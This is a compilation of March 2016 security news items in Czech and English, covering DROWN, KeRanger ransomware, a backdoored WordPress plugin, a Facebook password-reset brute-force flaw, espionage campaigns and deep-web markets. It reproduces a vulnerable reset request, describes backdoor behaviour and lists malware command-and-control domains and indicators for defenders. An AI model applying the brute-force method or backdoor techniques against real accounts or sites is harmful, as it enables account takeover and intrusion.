Cisco přepracovalo své firewally Firepower NGFW tak, aby podle svých slov namísto zaměření na regulaci aplikací naopak omezovaly rizika. Přístup lze prý přirovnat k ochraně rodinného domu – zatímco dříve se chránilo zabezpečením oken a dveří, nově se odhalují potenciální zloději.

Firepower Next-Generation Firewall řady 4100 podle výrobce představuje jejich vůbec první plně integrovaný firewall zaměřený na hrozby. Spolu s ním začala firma nabízet i asistenční službu Security Segmentation Service, která má firmám pomoci zavádět mj. bezpečnostní opatření pro zlepšení souladu s předpisy.

Firepower NGFW například propojuje kontextuální informace o tom, jak uživatelé přistupují k aplikacím, s aktuálními informacemi o hrozbách a s vynucováním pravidel. To urychluje odhalování a potlačování hrozeb.

Produkt je prý také jedním z prvních zařízení se 40Gb ethernetovým připojením v kompaktním provedení pro jednu pozici v racku. Firewall dokáže také na základě přehledu o zranitelnostech, informačních aktivech a hrozbách automatizovat a vylaďovat nastavení bezpečnostních opatření pro rychlé posílení obrany.

Novinka spojuje technologii firewallů a služby pro odhalování hrozeb do jediného řešení. Je založená i na řešeních třetích stran, kdy se umožňuje sdílení bezpečnostních a kontextových informací mezi různými systémy – třeba Radware for Distributed Denial of Service (DDoS).

Podniky tak podle výrobce mohou efektivně propojovat dříve nesourodé informace a díky nim rychleji odhalovat a reagovat na pokročilé útoky bez ohledu na to, kde k nim dojde.


Your iPhone will Alert You if You are Being Monitored At Work
8.3.2016 Apple
Are You an Employee?
It's quite possible that someone has been reading your messages, emails, listening to your phone calls, and monitoring your activities at work.
No, it's not a spy agency or any hacker…
...Oops! It's your Boss.
Recently, European Court had ruled that the Employers can legally monitor as well as read workers' private messages sent via chat software like WhatsApp or Facebook Messenger and webmail accounts like Gmail or Yahoo during working hours.
So, if you own a company or are an Employer, then you no need to worry about tracking your employees because you have right to take care of things that could highly affect your company and its reputation, and that is Your Employees!
Since there are several reasons such as Financial Need, Revenge, Divided Loyalty or Ego, why a loyal employee might turn into an INSIDER THREAT.
Insider Threat is a nightmare for Millions of Employers. Your employees could collect and leak all your professional, confidential data, upcoming project details to your Rivals and much more that could result in significant loss to the company.
According to the latest threat report conducted by the Vormetric, it is analyzed that 40% of organizations experienced a data breach last year, out of which 89% felt that their organizations were vulnerable to insider attacks.
In March 2010, an IT Developer in the British Airways had been accused of leaking the Airport Security procedures for terrorist-related activities. From this example, you could figure out that the Insider Threat may take up its devilish dimension to lead to a dangerous situation.
How Can Companies Monitor their Employees iPhone?
Some strategies could be benefited for the employers by tailing up employee’s daily activities during the work hours.
Major tech companies like Symantec and IBM have a history of maintaining a threat report to their employees by a dedicated device (BYOD) that regularly updates the Employee’s Professional Network usage, such as downloads or other social networking sessions, in a statistical method.
Apple also provides a similar feature to companies for monitoring their employee's activities via work-issued iPhones that are set up with an organization's Mobile Device Management (MDM) server.
This allows employers to remotely upgrade, control, track and supervise various aspects of the iPhone’s software.
iOS 9.3 Offers Companies to Monitor Employees Like Never Before
With the release of its upcoming iOS 9.3 version, Apple will provide a bunch of new features to employers, allowing companies to monitor their employees activities more deeply.
The new mobile operating system would let the company’s IT administrators enforce home screen layouts on your work-issued iPhones as well as lock apps to your home screen so that you can not be moved to a different folder or a page.
The upcoming iOS 9.3 will also allow companies to hide or blacklist specific applications that it does not want their employees to download.
So in short, your favorite games like Candy Crush or Angry Birds that your organization does not wish you to play during work hours could be blocked.
If this is not enough, your company will now also be able to enforce notification settings so that you will not be able to ignore your employers notifications.
So next time if your company calls you to report in a short notice period, you just can not say you have not read the message, neither you can give excuses that you missed it somehow.
These are some pretty significant changes the upcoming iOS 9.3 will bring in employers perspective.
Interestingly, the upcoming iOS 9.3 operating system empowers the employees as well. Let’s talk about what features the OS will offer employees.
iPhone will Notify if Your Company is Tracking You
The iOS 9.3 version will tell employees whether their employers are monitoring their company-issued iPhones.
This warning will now be displayed in two places on the work-issued iPhones:
Your iPhone’s lock-screen will display "This iPhone is managed by your organization" near the bottom of the screen, hindering you to use your phone for personal choice apart from professional usage.
Additionally, If you’ll check the "About" menu in the Setting, it will reveal what all data had been supervised by your Employer.
Such notification was not available in the previous version of iOS. This is the first time Apple is allowing its users to check whether their organization is keeping tabs on them.
Surely employees will love this new feature in upcoming iOS 9.3, but the companies may hate this features as their stand will be exposed for tracking their employees.
These new features would mark its presence in the upcoming iOS 9.3 release on March 21, 2016.


Expert discovered how to hack any Facebook account
8.3.2016 Social Site  Hacking

A security researcher has discovered a Facebook password reset vulnerability that allowed him to brute force into any FB account.
The security researcher Anand Prakash has discovered a password reset vulnerability affecting Facebook. The critical vulnerability could be exploited by attackers to hack into any FB account launching a brute force attack.

“This post is about a simple vulnerability found on Facebook which could have been used to hack into other user’s Facebook account easily without any user interaction. This gave me full access of another users account by setting a new password. I was able to view messages, his credit/debit cards stored under payment section, personal photos etc. Facebook acknowledged the issue promptly, fixed it and rewarded $15,000 USD considering the severity and impact of the vulnerability.” wrote the researcher in a blog post.

The critical flaw resides in the way Facebook’s beta pages handle “Forgot Password” requests. When a user forgets the password, Facebook allows him to get back into your FB account through the ‘Forgot Password’ procedure. Facebook sends a 6 digit code on a user’s phone number or email address. After you enter this code in the window, you are able to access your FB account and reset your password.

The user then submits the code to access his FB account and reset the password.

Prakash tried to find security holes in the Facebook’s Forgot Password procedure. He tried to brute force the 6 digit code in the ‘Forgot Password’ window, he discovered that it is possible to make just 12 attempts before being locked out.

Facebook Hack FB account

Prakash tried to perform the same operation on the Facebook beta pages, beta.facebook.com and mbasic.beta.facebook.com. He then discovered that there is no limit on the number of attempts for these two Facebook beta pages. The absence of a limitation, allowed the researcher to launch a brute force attack into any Facebook account.

The vulnerable request illustrated by the researcher is:

POST /recover/as/code/ HTTP/1.1 Host: beta.facebook.com
lsd=AVoywo13&n=XXXXX
Brute forcing the “n” successfully allowed Prakash to set a new password for any Facebook user.
Prakash reported the vulnerability to Facebook on February 22, 2016, the security team acknowledged the flaw and deployed a fix on February 23.

Facebook awarded Prakash a bug bounty of $15,000, below the Video PoC published by the expert:


Nebezpečná chyba DROWN je na 11 miliónech webů. V Česku jsou jich tisíce

7.3.2016 Zranitelnosti
Chyba DROWN, kterou mohou počítačoví piráti zneužít k odposlouchávání šifrované komunikace, se týká 11 miliónů webových stránek po celém světě. Upozornil na to server News Factor. V České republice jsou serverů, jež mohou být takto zneužity, tisíce.
O nebezpečné chybě DROWN informovaly Novinky.cz již minulý týden. [celá zpráva]

Už tehdy se hovořilo o tom, že zranitelnost se týká třetiny internetu. Přesné vyčíslení potencionálně nebezpečných serverů však ještě nebylo k dispozici.

S ohledem na 11 miliónů serverů po celém světě, které obsahují chybu DROWN, se zranitelnost logicky dotýká také podstatné části webů v České republice.

„Podle informací, které jsme doposud obdrželi, se problém týká téměř 13 000 IP adres. Všechny provozovatele těchto adres jsme již o tomto problému informovali,“ uvedla pro Novinky.cz analytička Zuzana Duračinská z Národního bezpečnostního týmu CSIRT, který je provozován sdružením CZ.NIC.

Jakých konkrétních webů se chyba týká, však neuvedla. To je vcelku logické, protože jinak by počítačoví piráti získali přehled o tom, na jaké servery se mohou zaměřit.

Uživatelé se bránit nemohou
Duračinská zároveň připomněla, že samotní uživatelé se proti útoku nemohou bránit. „Na straně uživatelů bohužel není možné se jakkoliv bránit. Potřebná opatření musí udělat dotčení provozovatelé služeb,“ doplnila.

Jediné, co mohou uživatelé dělat, je servery obsahující chybu nepoužívat. Ověřit, zda server obsahuje chybu DROWN je možné například zde. Stačí do kolonky vepsat požadovanou adresu a kliknout na tlačítko „Check for DROWN vulnerability”. Systém během chvilky vyhodnotí, zda daný web trhlinu obsahuje, či nikoliv.

Zranitelné mohou být webové stránky, mailové servery a jiné služby.
bezpečnostní analytik týmu CSIRT Pavel Bašta
Chyba se totiž týká šifrované komunikace, konkrétně staršího protokolu SSLv2. Právě kvůli tomu mohou zranitelnost opravit pouze provozovatelé serverů, nikoliv samotní uživatelé. Při návštěvě zranitelných stránek tak uživatelé nemusejí ani vědět, že něco není v pořádku.

Pokud se přihlašují na server, který obsahuje chybu, může být komunikace odposlouchávána. Když tedy zadají na počítači například přihlašovací údaje k internetovému bankovnictví, kyberzločinci se k nim mohou dostat díky chybě DROWN v podstatě ještě dřív, než dorazí na samotný server.

„Zranitelné mohou být webové stránky, mailové servery a jiné služby, které protokol TLS využívají,“ uvedl již dříve bezpečností analytik týmu CSIRT Pavel Bašta.


Plugin pro WordPress se může změnit v hrozbu, stačí změna majitele

7.3.2016 Zdroj: Lupa Hrozby

Roky spolehlivé pluginy pro WordPress se mohou proměnit v zásadní problém. Stačí, když se v nich objeví backdoor, který umožní převzít váš web.
Custom Content Type Manager (CCTM) je poměrně populární plugin pro WordPress, který slouží pro vytváření vlastních typů příspěvků. Najdete jej nainstalovaný na více než desítce tisíc webů. Sucuri ale varuje, že se v CCTM objevil backdoor.

Přišli na něj tak, že řešili napadený web a objevili podezřelý soubor auto-update.php právě ve složce s CCTM. Ten stahuje obsah z hxxp://wordpresscore .com/plugins/cctm/update/ a uloží ho do složky s CCTM jako PHP, tedy spustitelný soubor.

Při bližším zkoumání se potvrdilo, že zadní vrátka jsou přímo součástí CCTM, že nejde o výsledek napadení odjinud. A zjistili také to, že se zadní vrátka v CCTM objevila teprve 16. února 2016 v souvislosti s novým vlastníkem pluginu.

Právě změna vlastníků, ať už tím, že někdo původní plugin koupí, či se k vlastnictví dostane jiným způsobem, bývá nejčastějším momentem, kdy se z neškodných a spolehlivých věcí stávají škodlivé. Samotné CCTM přitom před touto změnou nebylo aktualizované dobrých deset měsíců – to je také jeden z příznaků, že je třeba si dát pozor: dlouho neaktualizované věci, které náhle dostanou aktualizaci. Sucuri upozorňují, že stejný nový vlastník se objevil u Postie pluginu.

Výše zmíněné auto-update.php ale není jedinou nebezpečnou změnou. V index.php se objevil přídavek, který se postará o odeslání informace na výše uvedené wordpresscore .com pokaždé, když se někdo přihlásí do svého webu. Velmi pravděpodobně slouží k tomu, aby se útočník dozvěděl, kde všude je plugin instalovaný.

Ve When a WordPress Plugin Goes Bad je také velmi detailní popis toho, jakým způsobem bylo právě CCTM použito pro hack. Ten spočíval ve využití auto-update.php pro stažení skriptu, který se postaral o změnu (vytvoření) wp-options.php. Následovaly zásahy do dalších souborů s vytvořením nového účtu správce. Změna dalších souborů navíc přinesla to, že útočník získal kompletní přihlašovací údaje.

Což ale není všechno. Další poměrně zvláštní změnou bylo přidání aktivace jquery.js z domény donutjs.com. Ta vypadá, jako kdyby skutečně byla zdrojem pro klasické jQuery, ale má řadu velmi podezřelých příznaků. Při bližším zkoumání zjistíte, že ve skutečnosti o jQuery vůbec nejde, uvnitř najdete pouze další skript, který nahlašuje instalaci/použití CCTM.

Máte ve Wordpressu CCTM nebo Postie?

Pokud ano, pak máte značný problém a měli byste se zbavit nejenom CCTM, ale také znovu nahrát čisté soubory wp-login.php, user-edit.php a user-new.php. Poté změnit hesla všem uživatelům, zrušit uživatele support a odstranit soubor wp-options.php, který se vám objevil v kořenové složce.

Pokud se bez CCTM neobejdete, tak je potřeba jít na poslední verzi, která není postižena – tou je 0.9.8.6. A k tomu nezapomenout na to, že automatické aktualizace (pokud jste je povolili) vám ji opět přepíší na napadenou variantu.


Ransomware je už i na Macu, stačilo stáhnout Transmission

7.3.2016 Zdroj: Lupa Viry

První plně funkční ransomware pro Mac zní jako dost velká věc na to, aby internet propadal panice. A ono se to tak trochu děje.
Palo Alto Networks nabízejí kompletní analýzu ransomware pro OS X skrývajícího se v podobě infikovaného instalátoru pro Transmission bittorent klienta. „KeRanger“, jak Palo Alto Networks tento nový virus pojmenovali, je dost dobře možná druhý ransomware pro OS X v historii (prvním je teoreticky FileCoder objevený Kaspersky Lab v roce 2014).

K infikování instalátorů pro Transmission došlo 4. března a napadena byla verze 2.90. Není známo, jakým způsobem k tomu došlo. Možná je kompromitovaný web, ale žádné bližší informace k dispozici nejsou.

Napadené instalátory jsou plně podepsané vývojářským certifikátem (jiným než běžným) a instalující uživatel nemá ponětí o tom, že vedle Transmission se mu do systému dostal další program.

Ten počká tři dny a poté se spojí s ovládacím serverem s pomocí sítě Tor a zahájí šifrování některých dokumentů a datových souborů v systému. Po dokončení klasicky zobrazí žádost o výkupné (jeden bitcoin). Pokud se budete chtít spoléhat na Time Machine pro obnovení, tak špatná zpráva je, že KeRanger se pokouší zašifrovat i obsah tam uložený.

Na Transmission webu už napadené instalátory nejsou, použitý certifikát byl Applem zneplatněn a antivirová data v XProtect už k KeRangeru obsahují potřebné informace.

Ve výše odkázané kompletní analýze viru je na konci i postup, jak ověřit, zda nejste tímto virem také napadeni. Lze to poznat jak podle přítomnosti některých souborů a disku, tak podle procesů v systému běžících.

Aktualizace XProtect antiviru znamená, že napadané verze Transmission nepůjde spustit. Případně je dobré vědět, že Transmission 2.92 by měla případně také pomoci v odstranění.


Nejlepší Antivir: podle testů AV Comparatives jsou výsledky těsné

7.3.2016 Zdroj: Živě Zabezpečení
Nezávislá testovací organizace AV Comparatives každoročně publikuje zprávu se souhrnnými výsledky z celoročního průběžného testování antivirových programů. Metodika testovaní se skládá z několika kategorií, které jsou hodnoceny zvlášť, přičemž o celkovém výsledku rozhodne souhrn těch dílčích. Hodnotí se úspěšnost v odstraňování malwaru, hledání infikovaných souborů, výkonnost, ochrana v reálném nasazení a proactive test.

Z celkového počtu dvaceti jedna testovaných antivirů všechny obdržely doporučující hodnocení, přesto ale některé vynikají více. Nejlepší hodnocení (Product of the year) obdržel software od Kaspersky Lab (konkrétně Kaspersky Internet Security).

Screen Shot 2016-03-06 at 00.09.36.png

Seznam všech testovaných antivirů a jejich výsledky v jednotlivých kategoriích

K prostudování výsledků nás motivoval rozsáhlý „falešní poplach“, který způsobil software od ESETu minulý týden. Na falešná hlášení se totiž antivirové programy rovněž testují a poslední test specializující se na tuto problematiku provedli v AV Comparatives v září loňského roku. Jak si vedl ESET? Zvítězil ještě spolu s dalšími dvěma programy, protože v rámci testu nenahlásil žádnou chybnou detekci. Případ z minulého týdne byl zjevně ojedinělý.

Screen Shot 2016-03-06 at 00.01.42.png

Testované antiviry v roce 2015

V celkovém hodnocení za rok 2015 získal Kaspersky ve většině kategorií nejlepší hodnocení a obhájil tak své prvenství z předchozího roku. V těsném závěsu se ale nachází hned šestice antivirů, které si také vedly velmi dobře. Tyto antiviry získávají ocenění „Top rated products“. S tímto označením z testu vyšel Avast, AVIRA, Bitdefender, Emsisoft, eScan a ESET.

Screen Shot 2016-03-06 at 00.30.21.png

Výsledky v kategorii „Real-world protection“, zde se hodnotí úspěšnost detektece škodlivého softwaru v reálném nasazení, zohledňuje se také míra falešných poplachů


Na Macy zamířil první funkční ransomware, šířil se skrz bittorrentový klient
7.3.2016 Zdroj: Živě
Viry

Ransomware je speciální typ malwaru, který má po infikaci za úkol zašifrování uživatelských dat. K jejich odemknutí je potom útočníky vyžadován poplatek, většinou v podobě bitcoinů. A zatímco v minulosti byl tento druh útoku doménou systému Windows, o víkendu se pravděpodobně poprvé rozšířil i do OS X. Zdrojem nákazy byl open-source nástroj Transmission, který slouží jako klient pro bittorrentovou síť. Šířil se přitom přes oficiální instalační balík.

Mac-Large.png

Transmission pro OS X, který o víkendu šířil ransomware

I když není jasné, jak se škodlivý kus kódu nazvaný OSX.KeRanger.A dostal do instalátoru, dokázal díky podepsanému vývojářskému certifikátu obejít i ochranu Gatekeeper v OS X. Nic mu potom nezabránilo vytvořit potřebné soubory, zašifrovat uživatelská data a začít komunikovat se servery útočníků prostřednictvím sítě Tor. Tam také byli uživatelé nasměrování pro zaplacení poplatku jednoho bitcoinu, tedy asi čtyř set dolarů, což mělo vést k odemknutí souborů.

Apple zareagoval jak zneplatněním vývojářského certifikátu, takže jsou uživatelé při instalaci důrazně varování před možným rizikem, tak aktualizací antivirového systému XProtect. Na webu Transmission potom visí upozornění na nutný update na verzi 2.92, která přinesla opravu a případné odstranění malwaru z OS.


First Mac OS X Ransomware Targets Apple Users
7.3.2016 Apple
Mac users, even you are not left untouched!
The World's first fully functional Ransomware targeting OS X operating system has been landed on Macs.
Ransomware – one of the fastest-growing cyber threats – encrypts the important documents and files on infected machines and then asks victims to pay ransoms in digital currencies so they can regain access to their data.
Though Ransomware has been targeting smartphones and Windows computers for a while, Mac OS X users haven't really had to worry about this threat… until now!
As security researchers from Palo Alto Networks claims to have discovered the very first known instance of OS X Ransomware in the wild, called "KeRanger" attacking Apple's Macintosh computers, firm's Threat Intelligence Director Ryan Olson told Reuters.
The KeRanger ransomware, which appeared on Friday, comes bundled into the popular Mac app Transmission, a free and open-source BitTorrent client for Mac with Millions of active users.
Must Read: How Just Opening an MS Word Doc Can Hijack Every File On Your System.
Here's How KeRanger Works
First Mac OS X Ransomware Targets Apple Users
Once a victim installs the infected versions of the app, KeRanger malware embeds itself in the victim's machine and encrypts the hard drive – containing important documents, images and videos files, as well as email archives and databases – after three days.
The KeRanger malware then asks the victim to pay 1 Bitcoin (~ $410) as the ransom amount to allow him/her to decrypt the hard disk and regain access to their important files.
The malware imposes a 72-hour lockout window unless the payment is made.
Though it is still unclear how the hackers managed to compromise the app and upload the infected files, it is believed that the hackers managed to hack the Transmission website as the site was served via HTTP rather than HTTPS.
Also Read: CTB-Locker Ransomware Spreading Rapidly, Infects Thousands of Web Servers.
How to Protect yourself against KeRanger
The security researchers suggested users to check for the existence of the following files in their machines:
/Applications/Transmission.app/Contents/Resources/General.rtf
/Volumes/Transmission/Transmission.app/Contents/Resources/ General.rtf
If any of the above-mentioned file exists, your Transmission app is likely infected with the new ransomware.
The malicious code also has a process name of "kernel_service", "kernel_pid", ".kernel_time" or ".kernel_complete," which can be killed, and stores its executable in the ~/Library directory. Delete these files if exist.
Upgrade to Version 2.91 of Transmission
Soon after, the Transmission developers released an updated version 2.92 of Transmission to ensure the ‘KeRanger’ malware files is actively removed.
So, if you had downloaded a vulnerable copy of Transmission from the web before the weekend, you must uninstall it now and upgrade to a clean 2.92 version of the software.
"Everyone running 2.90 on OS X should immediately upgrade to 2.91 or delete their copy of 2.90, as they may have downloaded a malware-infected file," Transmission posted this message in Red on its website.
Specifically, downloads of Transmission version 2.90 were infected with the nasty ransomware code that will encrypt your files after 3 days and demand a payment of $410 in Bitcoin to regain control.
However, it is worth noting that KeRanger has currently been detected only in the Transmission app for Mac. But, if the malware is widespread, it could affect other common Mac apps as well.


KeRanger, the new MAC OS X ransomware that hit Apple users on the weekend
7.3.2016 Apple  Virus

Over the weekend Apple customers who were looking for the latest version of Transmission were infected by KeRanger MAC OS X ransomware.
Bad news for Apple customers, their systems were targeted for the first time over the weekend by a ransomware campaign. The experts at Palo Alto Networks Unit 42 who discovered the malicious campaign reported that Apple customers who were looking for the latest version of Transmission, a popular BitTorrent client, were infected with a new family of Ransomware that was specifically designed to target OS X installations.

“On March 4, we detected that the Transmission BitTorrent ailient installer for OS X was infected with ransomware, just a few hours after installers were initially posted. We have named this Ransomware “KeRanger.” states the report published by Palo Alto Networks.

The researchers named this new Ransomware family KeRanger, they also released a technical analysis of the malware.

Ransomware attacks on MAC OS X systems is a novelty, in the past the unique malware with similar characteristics was FileCoder, a malicious code detected by Kaspersky Lab in 2014.

“The only previous ransomware for OS X we are aware of is FileCoder, discovered by Kaspersky Lab in 2014. As FileCoder was incomplete at the time of its discovery, we believe KeRanger is the first fully functional ransomware seen on the OS X platform.” continues the post.

KeRanger MAC OS X ransomware

According to the report, users who have directly downloaded Transmission installer from the official website in a specific time interval may be been infected by KeRanger MAC OS X ransomware.

“Users who have directly downloaded Transmission installer from official website after 11:00am PST, March 4, 2016 and before 7:00pm PST, March 5, 2016, may be been infected by KeRanger.”

The Transmission project promptly removed the malicious installers on Saturday (March 5) and it is urging its users to update to the latest version (2.92).

The experts discovered that the malware was embedded within the Transmission DMG file itself, but this was not enough to install the malware. The author of KeRanger also signed the installer with a valid code-signing certificate, issued to Polisan Boya Sanayi ve Ticaret A.Ş., a holding company in Istanbul, to bypass security measured implemented by the Apple’s Gatekeeper.

The experts noticed that authors have used hidden services to masquerade the command and control infrastructure, once infected a machine the KeRanger MAC OS ransomware will wait three days before contacting a Command & Control server. Below the list of services in the Tor network used in the by the ransomware.

lclebb6kvohlkcml.onion[.]link
lclebb6kvohlkcml.onion[.]nu
bmacyzmea723xyaz.onion[.]link
bmacyzmea723xyaz.onion[.]nu
nejdtkok7oz5kjoc.onion[.]link
nejdtkok7oz5kjoc.onion[.]nu
Once the ransomware has contacted the server it starts encrypting documents having more than 300 different extensions:

Documents: .doc, .docx, .docm, .dot, .dotm, .ppt, .pptx, .pptm, .pot, .potx, .potm, .pps, .ppsm, .ppsx, .xls, .xlsx, .xlsm, .xlt, .xltm, .xltx, .txt, .csv, .rtf, .tex
Images: .jpg, .jpeg,
Audio and video: .mp3, .mp4, .avi, .mpg, .wav, .flac
Archives: .zip, .rar., .tar, .gzip
Source code: .cpp, .asp, .csh, .class, .java, .lua
Database: .db, .sql
Email: .eml
Certificate: .pem
It is interesting to note that the ransomware is not able to start the encrypting process without making the initial contact to C&C servers.

When the files are encrypted, the KeRanger MAC OS ransomware demands $400.00 USD to the victims

The researchers suspect that the KeRanger MAC OS ransomware is still under development, in fact, they noticed the malware doesn’t encrypt Time Machine backup files, but the analysis of the code revealed that the is code to perform this action is already present in the malware, but it is still not active.

“Additionally, KeRanger appears to still be under active development and it seems the malware is also attempting to encrypt Time Machine backup files to prevent victims from recovering their back-up data.”

To mitigate the infections, the digital certificate used to sign the code has been already revoked. Apple added the installers to the Gatekeeper blacklist and also updated XProtect signatures to include the new KeRanger Ransomware family.


Studie: devět z deseti SSL VPN je beznadějně nebezpečných

7.3.2016 Hrozby

Používat VPN je v dnešních dnech jedna z důležitých součástí bezpečnější komunikace po internetu. Ale co když samy VPN služby nejsou bezpečné?
Devět z deseti SSL VPN je nebezpečných pro uživatele, používá zastaralé či nedostatečné formy šifrování a představuje hrozbu pro data, která skrz ně posíláte. To je výsledek testu 10 436 veřejně dostupných SSL VPN serverů (z celkového počtu asi 4 milionů náhodně vybraných adres) od těch největších výrobců jako je Cisco, Fortinet či Dell.

77 % z nich používá SSLv3 protokol, zhruba stovka dokonce SSLv2. Oba tyto protokoly jsou nejenom zastaralé, ale hlavně mohou být zneužité řadou zranitelností a útoků. Ani jeden není považován za bezpečný.

76 % používá nedůvěryhodné SSL certifikáty, což je vystavuje riziku MITM (Man in the middle) útoku. Což v praxi může znamenat, že s pomocí falešného serveru se hackeři mohou dostat ke všemu, co posíláte.

74 % má certifikáty s nebezpečným SHA-1 podpisem, 5 % dokonce používá ještě starší MD5 technologie.

41 % používá nebezpečné 1024 bitové klíče pro RSA certifikáty. Obecně se předpokládá, že cokoliv pod 2048 bitů délky není bezpečné.

10 % SSL VPN serverů je založeno na Open SSL a zároveň stále napadnutelné nyní již hodně starým Heartbleed útokem (zranitelnost objevená v dubnu 2014).

Pouze 3 % vyhovují PCI DSS požadavkům a žádné SSL VPN nevyhovují NIST pravidlům.

Podrobnější informace najdete v 90% of SSL VPNs use insecure or outdated encryption, putting your data at risk, tedy přímo u autorů studie (testu), společnosti High-Tech Bridge.


RIP Ray Tomlinson, The Creator of Email, Dies at 74
7.3.2016 IT
A computing legend who 'changed the way the world communicates' has died.
RAY TOMLINSON, the man who invented email as we know it today and picked the @ symbol for email addresses, passed away at the age of 75 following an apparent heart attack Saturday morning, according to reports.
Hard to believe but 'the godfather of email' has passed away.
His death was confirmed by Mike Doble, director of corporate PR at Tomlinson's employer Raytheon.
"A true technology pioneer, Ray was the man who brought us the email in the early days of networked computers," Doble said in a statement confirming Tomlinson's death.
The Internet reacted with sadness over the death of Tomlinson, who became a legend for his invention in 1971 of a system that allowed a user on one network to send a message to other computer users on other networks.
"Thank you, Ray Tomlinson, for inventing email and putting the @ sign on the map. #RIP," Gmail tweeted yesterday.
Tomlinson Introduced @ in Email Address
At the time of his invention, Tomlinson was working on ARPANET – predecessor of the modern Internet – at research and design company Bolt Beranek and Newman (now BBN Technologies).
Tomlinson used @ symbol in the email address in order to separate the username from the host name.
By the 1990s email had become a pillar of the Internet and Tomlinson was inducted into the Internet Hall of Fame in 2012, though he could not say what the very first email sent back in 1971 actually said.
Tomlinson said in an interview with the New York Times in 2009 that the email was just random strings of text, saying:
"I sent a number of test messages to myself from one machine to the other. The test messages were entirely forgettable and, therefore, forgotten."
Thanks to Tomlinson's invention that powers over a Billion and a half users communicating across the traditional barriers of time and space. #RIPRayTomlinson


Operation Transparent Tribe targets Indian diplomats and military
7.3.2016 Safety

ProofPoint uncovered a new cyber espionage campaign dubbed Operation Transparent Tribe targeting Indian diplomatic and military entities.
A new cyber espionage campaign dubbed Operation Transparent Tribe is targeting diplomats and military personnel in India. The researchers at Proofpoint who have uncovered the hacking campaign confirmed that threat actors used a number of hacking techniques to hit the victims, including phishing and watering hole attacks, and drop a Remote Access Trojan (RAT) dubbed MSIL/Crimson.

The MSIL/Crimson RAT used in the cyber espionage operation implements a variety of data exfiltration functions, including the ability to control the laptop cameras, take screen captures and keylogging.

The researchers discovered the campaign on February 11, 2016, when they noticed two live attacks against Indian diplomats operating in embassies in Saudi Arabia and Kazakhstan.

Proofpoint discovered that IP addresses involved in the attacks are in Pakistan, the attacks appear sophisticated and are part of a wider operation that relies on a network of watering hole websites and multiple phishing email campaigns.

The nature of the target and the methods used by attackers suggest the involvement of a nation-state attacker as explained by Kevin Epstein, VP of threat operations center at Proofpoint.

“This is a multi-year and multi-vector campaign clearly tied to state-sponsored espionage,” Epstein told to ThreatPost. “In the world of crimeware, you rarely see this type of complexity. A nation-state using multiple vectors, that’s significant.”

State-sponsored hacking is becoming a privileged option for governments that target other states mainly for cyber espionage with the intent of gathering intelligence on political issues.

Operation Transparent Tribe 2

The campaign discovered by ProofPoint required a significant effort of the APT group that set up multiple websites used to serve the MSIL/Crimson RAT.

In one case, the ATP behind the Operation Transparent Tribe used malicious email to spread weaponized RTF documents exploiting the CVE-2012-0158 Microsoft ActiveX vulnerability that dropped the malware on the target’s machine.

MSIL/Crimson is a multi-stage malware, after infected the machine in the first stage, it downloads more fully featured remote access Trojan component.

The attackers also used rogue blogs news websites with an Indian emphasis to serve the dangerous RAT.

Operation Transparent Tribe

Enjoy the Operation Transparent Tribe report.


Which are principal cybercriminal ecosystems in the Deep Web?
7.3.2016 Crime

TrendMicro published an interesting analysis of the principal cyber criminal underground communities in the Deep Web worldwide.
A new interesting report published by the experts at TrendMicro highlights the differences between the principal underground ecosystems worldwide.

Thinking of a unique “global” underground ecosystem is an error, every community has its own characteristics, the criminal crews that compose it are specialized in the provisioning of specific product and services.

The researchers who analyzed illegal activities in the Deep Web have identified at least six different cybercriminal ecosystems operating in Russia, Japan, China, Germany, in the United States and Canada (North America), and Brazil.

criminal underground markets Deep Web

“Each country’s market is as distinct as its culture. The Russian underground, for instance, can be likened to a well-functioning assembly line where each player has a role to play. It acts as the German market’s “big brother” as well in that it greatly influences how the latter works. The Chinese market, meanwhile, boasts of robust tool and hardware development, acting as a prototype hub for cybercriminal wannabes. Brazil is more focused on banking Trojans while Japan tends to be deliberately exclusive to members.” states the report.

The last report published by TrendMicro explains the differences, revealing the peculiarity of the offer in each ecosystem.

“Cybercriminals from every corner of the world take advantage of the anonymity of the Web, particularly the Deep Web, to hide from the authorities. Infrastructure and skill differences affect how far into the Deep Web each underground market has gone. Chinese cybercriminals, for instance, do not rely on the Deep Web as much as their German and North American counterparts do. This could, however, be due to the fact that the “great firewall” of China prevents its citizens (even the tech-savviest of its cybercrooks) from accessing the Deep Web. The fact that Germany and North America more strictly implement cybercrime laws may have something to do with their greater reliance on the Deep Web, too.”

The Russian underground is defined “a well-functioning assembly line,” it is an ecosystem crowded by professional sellers that competing each other by providing goods in the shortest amount of time and most efficient manner possible. Marketplaces like fe-ccshop.su and Rescator that offer products and services for credit card frauds are very popular in the criminal underground worldwide.

These markets offer escrowing services or “garants,” that make them an important aggregator for the criminal demand, offering them a privileged environment where operate anonymously.

The Japanese underground is characterized by members only bulletin board systems, the criminals make large use of special jargon to evade the authorities. This market is characterized by the attitude in accepting more unusual kinds of payment, including gift cards and forum points instead of bitcoins or cash paid via money transfer.

The Chinese underground is focused on the provisioning of hardware several illegal activities rapidly responding to the cybercriminal demand.

“The Chinese underground is a teeming hub of prototypes. It not only sells the usual array of software and services found in its counterparts, but also hardware. It adapts the fastest to the latest in cybercrime trends and leads the way in terms of cybercriminal innovation. And true to its adaptive nature, it now boasts of uncommon offerings like leaked-data search engine privacy protection services that can only be dubbed “made in China.” states the report.

The North American underground is considered the most open to novices, it is visible to both cybercriminals and law enforcement, meanwhile the Canadian underground is focused on the sale of fake/stolen documents and credentials (fake driver’s licenses and passports, stolen credit card and other banking information, and credit “fullz” or complete dumps of personal information).

Germany’s underground is a subsidiary of the Russian one, the market heavy rely on DarkNets, the most popular forums use mirrors on the Tor Network. Deep Web.

Let’s close with the Brazilian underground, which is characterized by the presence of youngsters with no regard for the law. They use the Surface Web, exploiting popular social media for their activities.

The key findings of the study highlights:

The Japanese underground is the only market that does not focus on traditional crimeware. This underground scene caters more to the taboo.
The German underground takes cues from the Russian market.
The Chinese underground serves as a hotbed for crimeware (particularly hardware) prototypes.
For more details on the criminal ecosystem in the Deep Web give a look to the report “Cybercrime and the Deep Web”


Nebezpečná chyba ohrožuje třetinu internetu. Uživatelé se bránit nemohou

6.3.2016 Zranitelnosti
Bezpečnostní experti odhalili novou nebezpečnou trhlinu zvanou DROWN, která může být zneužita k napadení šifrované komunikace na webu. Kyberzločinci tak mohou snadno odposlouchávat přístupové údaje včetně hesel, nebo například čísla kreditních karet i s ověřovacími prvky. Zranitelnost se týká třetiny internetu, uvedl Národní bezpečnostní tým CSIRT.CZ.
